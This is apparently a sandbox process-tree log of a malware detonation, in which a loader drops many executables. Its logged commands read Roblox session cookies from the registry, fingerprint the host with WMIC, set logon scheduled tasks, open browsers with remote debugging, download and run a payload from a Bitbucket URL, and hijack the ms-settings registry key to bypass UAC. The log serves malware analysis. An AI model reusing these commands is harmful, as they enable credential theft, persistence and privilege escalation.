C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4464
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2312
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1012
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2404
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵PID:4924
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Command and Scripting Interpreter: PowerShell
PID:1180
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name4⤵
- Detects videocard installed
PID:2532
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\a\saloader.exe" && pause4⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4680 -
C:\Windows\system32\PING.EXEping localhost5⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1432
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\aidans.dont.run.exe"C:\Users\Admin\AppData\Local\Temp\a\aidans.dont.run.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2076 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "windows" /tr '"C:\Users\Admin\AppData\Roaming\windows.exe"' & exit4⤵PID:4812
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "windows" /tr '"C:\Users\Admin\AppData\Roaming\windows.exe"'5⤵
- Scheduled Task/Job: Scheduled Task
PID:1732
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpCBBC.tmp.bat""4⤵PID:1664
-
C:\Windows\system32\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
PID:4084
-
-
C:\Users\Admin\AppData\Roaming\windows.exe"C:\Users\Admin\AppData\Roaming\windows.exe"5⤵
- Executes dropped EXE
PID:404
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\handeltest.exe"C:\Users\Admin\AppData\Local\Temp\a\handeltest.exe"3⤵
- Executes dropped EXE
PID:2020
-
-
C:\Users\Admin\AppData\Local\Temp\a\xs.exe"C:\Users\Admin\AppData\Local\Temp\a\xs.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4088 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "aspnet_regbrowsers" /tr '"C:\Users\Admin\AppData\Roaming\aspnet_regbrowsers.exe"' & exit4⤵PID:2572
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "aspnet_regbrowsers" /tr '"C:\Users\Admin\AppData\Roaming\aspnet_regbrowsers.exe"'5⤵
- Scheduled Task/Job: Scheduled Task
PID:4220
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpCC87.tmp.bat""4⤵PID:3708
-
C:\Windows\system32\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
PID:2400
-
-
C:\Users\Admin\AppData\Roaming\aspnet_regbrowsers.exe"C:\Users\Admin\AppData\Roaming\aspnet_regbrowsers.exe"5⤵
- Executes dropped EXE
PID:3404
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Tutorial.exe"C:\Users\Admin\AppData\Local\Temp\a\Tutorial.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3392 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"4⤵PID:2796
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\aa.exe"C:\Users\Admin\AppData\Local\Temp\a\aa.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1784 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "atat" /tr '"C:\Users\Admin\AppData\Roaming\atat.exe"' & exit4⤵PID:384
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "atat" /tr '"C:\Users\Admin\AppData\Roaming\atat.exe"'5⤵
- Scheduled Task/Job: Scheduled Task
PID:3096
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpC92C.tmp.bat""4⤵PID:4380
-
C:\Windows\system32\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
PID:3212
-
-
C:\Users\Admin\AppData\Roaming\atat.exe"C:\Users\Admin\AppData\Roaming\atat.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2004
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\nobody.exe"C:\Users\Admin\AppData\Local\Temp\a\nobody.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2864
-
-
C:\Users\Admin\AppData\Local\Temp\a\ataturk.exe"C:\Users\Admin\AppData\Local\Temp\a\ataturk.exe"3⤵
- Executes dropped EXE
PID:2416
-
-
C:\Users\Admin\AppData\Local\Temp\a\start.exe"C:\Users\Admin\AppData\Local\Temp\a\start.exe"3⤵
- Executes dropped EXE
PID:4100 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "System32" /tr '"C:\Users\Admin\AppData\Roaming\System32.exe"' & exit4⤵PID:872
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "System32" /tr '"C:\Users\Admin\AppData\Roaming\System32.exe"'5⤵
- Scheduled Task/Job: Scheduled Task
PID:4228
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD0AE.tmp.bat""4⤵
- System Location Discovery: System Language Discovery
PID:4876 -
C:\Windows\SysWOW64\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
PID:2040
-
-
C:\Users\Admin\AppData\Roaming\System32.exe"C:\Users\Admin\AppData\Roaming\System32.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4900
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Winsvc.exe"C:\Users\Admin\AppData\Local\Temp\a\Winsvc.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops startup file
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2988 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"4⤵PID:5316
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\TPB-1.exe"C:\Users\Admin\AppData\Local\Temp\a\TPB-1.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:2276 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"4⤵
- Uses browser remote debugging
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:2204 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa5cb8cc40,0x7ffa5cb8cc4c,0x7ffa5cb8cc585⤵PID:3236
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1828,i,18131136590942653605,17419875381801975788,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1820 /prefetch:25⤵PID:4516
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2052,i,18131136590942653605,17419875381801975788,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2132 /prefetch:35⤵PID:2380
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2184,i,18131136590942653605,17419875381801975788,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2472 /prefetch:85⤵PID:4228
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3108,i,18131136590942653605,17419875381801975788,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3156 /prefetch:15⤵
- Uses browser remote debugging
PID:3068
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3116,i,18131136590942653605,17419875381801975788,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3412 /prefetch:15⤵
- Uses browser remote debugging
PID:984
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4508,i,18131136590942653605,17419875381801975788,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4496 /prefetch:15⤵
- Uses browser remote debugging
PID:4844
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4852,i,18131136590942653605,17419875381801975788,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4824 /prefetch:85⤵PID:1872
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:5836 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa5be23cb8,0x7ffa5be23cc8,0x7ffa5be23cd85⤵PID:5848
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1832,16174142234199295901,13513753183680312657,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1868 /prefetch:25⤵PID:6136
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1832,16174142234199295901,13513753183680312657,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:35⤵PID:5124
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1832,16174142234199295901,13513753183680312657,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2604 /prefetch:85⤵PID:5140
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1832,16174142234199295901,13513753183680312657,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3172 /prefetch:15⤵
- Uses browser remote debugging
PID:5296
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1832,16174142234199295901,13513753183680312657,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3180 /prefetch:15⤵
- Uses browser remote debugging
PID:3336
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1832,16174142234199295901,13513753183680312657,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1836 /prefetch:25⤵PID:2992
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1832,16174142234199295901,13513753183680312657,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2588 /prefetch:25⤵PID:5564
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1832,16174142234199295901,13513753183680312657,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2572 /prefetch:15⤵
- Uses browser remote debugging
PID:5328
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1832,16174142234199295901,13513753183680312657,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4520 /prefetch:15⤵
- Uses browser remote debugging
PID:4084
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JKKEHJDHJKFI" & exit4⤵PID:6744
-
C:\Windows\SysWOW64\timeout.exetimeout /t 105⤵
- Delays execution with timeout.exe
PID:6972
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\gvndxfghs.exe"C:\Users\Admin\AppData\Local\Temp\a\gvndxfghs.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3080 -
C:\Users\Admin\AppData\Local\Temp\a\gvndxfghs.exeC:\Users\Admin\AppData\Local\Temp\a\gvndxfghs.exe4⤵
- Executes dropped EXE
PID:2184 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2184 -s 925⤵
- Program crash
PID:4744
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\gvndxfghs.exeC:\Users\Admin\AppData\Local\Temp\a\gvndxfghs.exe4⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- outlook_office_path
- outlook_win_path
PID:3660
-
-
C:\Users\Admin\AppData\Local\Temp\a\gvndxfghs.exeC:\Users\Admin\AppData\Local\Temp\a\gvndxfghs.exe4⤵
- Executes dropped EXE
PID:844 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 844 -s 925⤵
- Program crash
PID:4280
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 844 -s 1005⤵
- Program crash
PID:1260
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 844 -s 1285⤵
- Program crash
PID:3024
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\random.exe"C:\Users\Admin\AppData\Local\Temp\a\random.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5080 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5080 -s 13204⤵
- Program crash
PID:5588
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\unik.exe"C:\Users\Admin\AppData\Local\Temp\a\unik.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2336 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2336 -s 14764⤵
- Program crash
PID:6048
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\xblkpfZ8Y4.exe"C:\Users\Admin\AppData\Local\Temp\a\xblkpfZ8Y4.exe"3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
PID:1860
-
-
C:\Users\Admin\AppData\Local\Temp\a\test28.exe"C:\Users\Admin\AppData\Local\Temp\a\test28.exe"3⤵
- Executes dropped EXE
PID:2800
-
-
C:\Users\Admin\AppData\Local\Temp\a\test26.exe"C:\Users\Admin\AppData\Local\Temp\a\test26.exe"3⤵
- Executes dropped EXE
PID:1164
-
-
C:\Users\Admin\AppData\Local\Temp\a\test27.exe"C:\Users\Admin\AppData\Local\Temp\a\test27.exe"3⤵
- Executes dropped EXE
PID:2616
-
-
C:\Users\Admin\AppData\Local\Temp\a\test29.exe"C:\Users\Admin\AppData\Local\Temp\a\test29.exe"3⤵
- Executes dropped EXE
PID:3672
-
-
C:\Users\Admin\AppData\Local\Temp\a\test25.exe"C:\Users\Admin\AppData\Local\Temp\a\test25.exe"3⤵
- Executes dropped EXE
PID:5152
-
-
C:\Users\Admin\AppData\Local\Temp\a\test24.exe"C:\Users\Admin\AppData\Local\Temp\a\test24.exe"3⤵
- Executes dropped EXE
PID:5200
-
-
C:\Users\Admin\AppData\Local\Temp\a\tik-tok-1.0.5.0-installer_iPXA-F1.exe"C:\Users\Admin\AppData\Local\Temp\a\tik-tok-1.0.5.0-installer_iPXA-F1.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:5668
-
-
C:\Users\Admin\AppData\Local\Temp\a\main_v4.exe"C:\Users\Admin\AppData\Local\Temp\a\main_v4.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5708 -
C:\Windows\SysWOW64\tasklist.exetasklist4⤵
- Enumerates processes with tasklist
PID:4968
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe4⤵
- Kills process with taskkill
PID:6504
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic os get Caption,Version4⤵
- System Location Discovery: System Language Discovery
PID:6728
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic os get InstallDate4⤵PID:6956
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command [CultureInfo]::InstalledUICulture.Name4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:7024
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic cpu get Name,NumberOfCores,NumberOfLogicalProcessors,Manufacturer4⤵PID:3396
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic memorychip get Capacity4⤵
- System Location Discovery: System Language Discovery
PID:5840
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic path win32_videocontroller get Name4⤵
- Detects videocard installed
PID:5868
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic csproduct get UUID4⤵PID:7564
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic csproduct get UUID4⤵PID:3032
-
-
C:\Windows\SysWOW64\tasklist.exetasklist4⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:8528
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic os get Caption,Version4⤵PID:756
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic os get InstallDate4⤵
- System Location Discovery: System Language Discovery
PID:5768
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command [CultureInfo]::InstalledUICulture.Name4⤵
- Command and Scripting Interpreter: PowerShell
PID:3860
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic cpu get Name,NumberOfCores,NumberOfLogicalProcessors,Manufacturer4⤵PID:2352
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic memorychip get Capacity4⤵PID:3900
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic path win32_videocontroller get Name4⤵
- Detects videocard installed
PID:5816
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic csproduct get UUID4⤵PID:3080
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic csproduct get UUID4⤵PID:4904
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\TikTok18.exe"C:\Users\Admin\AppData\Local\Temp\a\TikTok18.exe"3⤵
- Executes dropped EXE
PID:5736 -
C:\Users\Admin\AppData\Local\Temp\e58f72c\TikTok18.exerun=1 shortcut="C:\Users\Admin\AppData\Local\Temp\a\TikTok18.exe"4⤵
- Executes dropped EXE
PID:5940 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c .\TikTok18.bat5⤵
- System Location Discovery: System Language Discovery
PID:5320 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/superappsss/1/downloads/papa_hr_build.exe', 'C:\Users\Admin\AppData\Local\Temp\papa_hr_build.exe')";6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:4616
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Users\Admin\AppData\Local\Temp\papa_hr_build.exe;6⤵PID:2164
-
C:\Users\Admin\AppData\Local\Temp\papa_hr_build.exeC:\Users\Admin\AppData\Local\Temp\papa_hr_build.exe ;7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3020 -
C:\Users\Admin\AppData\Local\Temp\papa_hr_build.exe"C:\Users\Admin\AppData\Local\Temp\papa_hr_build.exe"8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3516 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3516 -s 12969⤵
- Program crash
PID:5320
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3516 -s 13369⤵
- Program crash
PID:6052
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3020 -s 3128⤵
- Program crash
PID:3612
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\papa_hr_build.exe"C:\Users\Admin\AppData\Local\Temp\a\papa_hr_build.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1044 -
C:\Users\Admin\AppData\Local\Temp\a\papa_hr_build.exe"C:\Users\Admin\AppData\Local\Temp\a\papa_hr_build.exe"4⤵
- Executes dropped EXE
PID:5516 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5516 -s 12565⤵
- Program crash
PID:5848
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5516 -s 12725⤵
- Program crash
PID:5228
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 3004⤵
- Program crash
PID:4416
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\fHR9z2C.exe"C:\Users\Admin\AppData\Local\Temp\a\fHR9z2C.exe"3⤵
- Executes dropped EXE
PID:5532 -
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵PID:1380
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵PID:876
-
-
-
C:\Windows\system32\cmd.exe/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\3082.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f4⤵PID:5740
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\3082.vbs" /f5⤵
- Modifies registry class
PID:3392
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f5⤵
- Modifies registry class
PID:6048
-
-
-
